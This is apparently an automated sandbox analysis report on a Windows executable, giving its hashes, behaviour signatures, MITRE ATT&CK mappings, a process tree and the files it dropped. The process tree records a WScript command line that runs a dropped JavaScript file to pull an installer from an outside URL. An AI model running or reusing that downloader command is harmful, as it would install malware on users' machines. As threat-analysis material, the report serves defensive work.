a979083cef3027dc433692c7f52e943b6bcc2842acc0bab091b618fc404b1b44

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
23/05/2024, 21:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe
Size

184KB
MD5

6c602db62d206aa13e39dcffee67d404
SHA1

7442eea98042ca510c163db659238277982f698e
SHA256

a979083cef3027dc433692c7f52e943b6bcc2842acc0bab091b618fc404b1b44
SHA512

7f1df756497bd9923a617593736b43adf012b38476ca8628bacbcc4023724612bf61804b4d45e9a9c7bd6485a8c272a9a47bd09e49cefa8057def6ab2929feb7
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3I:/7BSH8zUB+nGESaaRvoB7FJNndn1

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2636	WScript.exe
8	2636	WScript.exe
10	2636	WScript.exe
12	2472	WScript.exe
13	2472	WScript.exe
15	2812	WScript.exe
16	2812	WScript.exe
18	1196	WScript.exe
19	1196	WScript.exe
21	2152	WScript.exe
22	2152	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2336	1860	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1860 wrote to memory of 2636	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2636	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	28
PID 1860 wrote to memory of 2472	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2472	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2472	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2472	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	30
PID 1860 wrote to memory of 2812	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2812	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2812	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	32
PID 1860 wrote to memory of 2812	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	32
PID 1860 wrote to memory of 1196	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1196	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1196	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	34
PID 1860 wrote to memory of 1196	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	34
PID 1860 wrote to memory of 2152	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2152	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2152	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2152	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	36
PID 1860 wrote to memory of 2336	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	38
PID 1860 wrote to memory of 2336	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	38
PID 1860 wrote to memory of 2336	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	38
PID 1860 wrote to memory of 2336	1860	6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe	38

C:\Users\Admin\AppData\Local\Temp\6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\6c602db62d206aa13e39dcffee67d404_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1860
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf686.js" http://www.djapp.info/?domain=ipEsBoWrYM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf686.exe
  2⤵
  - Blocklisted process makes network request
  PID:2636
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf686.js" http://www.djapp.info/?domain=ipEsBoWrYM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf686.exe
  2⤵
  - Blocklisted process makes network request
  PID:2472
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf686.js" http://www.djapp.info/?domain=ipEsBoWrYM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf686.exe
  2⤵
  - Blocklisted process makes network request
  PID:2812
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf686.js" http://www.djapp.info/?domain=ipEsBoWrYM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf686.exe
  2⤵
  - Blocklisted process makes network request
  PID:1196
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf686.js" http://www.djapp.info/?domain=ipEsBoWrYM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjQiodRIIVA0RmGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4W8ARNmNAMCdXMWAnI7ZWcJfndWFTQ8Ceizxfr7RVJSNKY6xJX C:\Users\Admin\AppData\Local\Temp\fuf686.exe
  2⤵
  - Blocklisted process makes network request
  PID:2152
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1860 -s 608
  2⤵
  - Program crash
  PID:2336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
6e66bd2d283b36991f7460262e5ff4ae

SHA1
eb6906c6d9350ef0b8ff2edd81c3e51649b4a916

SHA256
564b4fa6970bf22294bceca2fb8f53087f3f5dec9565872d731cedd80aa9e7c3

SHA512
974fef50144e97b5bbae326f07ec863082693396e85dd42a0f85c86b6a3d0928b2da485cb7b3e541942d3c9bf49ce2f8063acf0ced79d6ed755928fdba453727

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
3b23ea4ca8e6676a3ba865db8177da14

SHA1
a4b61a694ac0bed7faa42e2ffccc54ff906fa757

SHA256
76ba4eae5d4f8461f79ca51ea235b4454e8bf02d129fc31078e5fbbaf936565d

SHA512
7941247bbfc24cb8cd6dfce3781f78feb4a1a1c930192cf253c55fe1abb84d6d72dba823db8722fd4142f31a9dd8b9336c21c9dd845322d30a87c6ffb554cce5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
332d938f7706ddcd590e75e273a0aeb6

SHA1
9feaa58009e8547069f3e3560f8a10f1529c27ca

SHA256
6970a9b90b51f5c3ed64f22a3aa67d3683702c025a9ffeb638ca32736735e0cb

SHA512
eb549c032944aadd20d08ef2d68985358dc3e576ff7dc8a6b0418a54cf56191361a4fb17ecb9d339347984ddc00517413e194ef3cad9cf11900663e3b0a3783f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
206528d66a164724180874f7af2d90c3

SHA1
33d950a53a9b1ac78148939df2e35ac97b601849

SHA256
be95fa7858c2a3c7550ffb353e465ef3031f51c862312d16b8525df054a75612

SHA512
961e6832104f69297b3bb2f3450db1b4a372b204358080906362183b523559a358a5ffe227d8597f6d9f047eff5ad7806bc64349036a47ae21ff9c8a61dafca1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
40KB

MD5
d68f25043c37625a283da1d70052263e

SHA1
b4ba185137347a08717947cd433bf9240fa37059

SHA256
6d883029225bed652a3a1af30dda7db18a99e9536972679e91e8166b85a22e51

SHA512
403aa1624410334b6a613d5cdbb9b0587a8f9214f67bc416fdd57e9642d7ca37ae3ebf05974430bad69be291df1e677dd996ff48723b1bfdecaa081893a7ea47

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\528EVS6A\domain_profile[1].htm

Filesize
6KB

MD5
f6a61fecfdf36cd3821fd852c0953bf2

SHA1
86e18017b4630144cade2306ff57799d74b87df8

SHA256
1536591e3c0946c8a9ca2eda3b0d48fc583ab1b0f7734dfcee13798f91633070

SHA512
9ea9d52e52a4d0601e94c344356e3f886cefbc38d7f13cce8cc8749222eaf15972cfe45b5e42bd3ce6469994eca6f114faedcc6bf6e8b6427580490dc9559c86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
40KB

MD5
4e914ff84870b12d323c87de1ad9c94e

SHA1
165d5d2231c99aaea1dae8dc9920175117e55bf9

SHA256
c5c9b5416d2f79ab12802a494be618f5925245d1e0009d6bebe7165a57c34ed8

SHA512
ce7a871a5b2e8c266b7fe80c246a17418f2e2cb86627cbcb756675943a405b0d72cc6617cc4914a3afecb22ab768267820206abcaf315537d1baa7c9f4662aab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PH7CXNA3\domain_profile[1].htm

Filesize
6KB

MD5
2ba6bed495b2bb432ee066b4b09ff521

SHA1
dac88914262b7f01133dcbad502909d72c8e148f

SHA256
1ac2acdd52eb793f8b58fdf501d702e7f6867d27f18dcc2d539a71448a0c4156

SHA512
eff56d8ff65c9bf60cd90051b451e50897f0860f9bebbe144b29d87ce5c3adcf912278a49d30fc1fabd03c4019f5b0308993a6963214562e94a1461e7f505477

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5254.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar6672.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf686.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\QVUOPACJ.txt

Filesize
177B

MD5
0045d780fdeaa3aacdc43b515db036fb

SHA1
0ead532a3ffd653f1f1e9e303863e9e83a488fe9

SHA256
36779d539df6460b5427c296ae79028cfa9f8fb20afdaf620877f750ac7ce3d1

SHA512
ff59a613619873ecc5442a72d3b618399e5278306a3528c9483053e5d1938af68e05cb251a3c83557fc6cc08f74853b2d44544ead332fe3ab7654b5738ff4680

Download Submit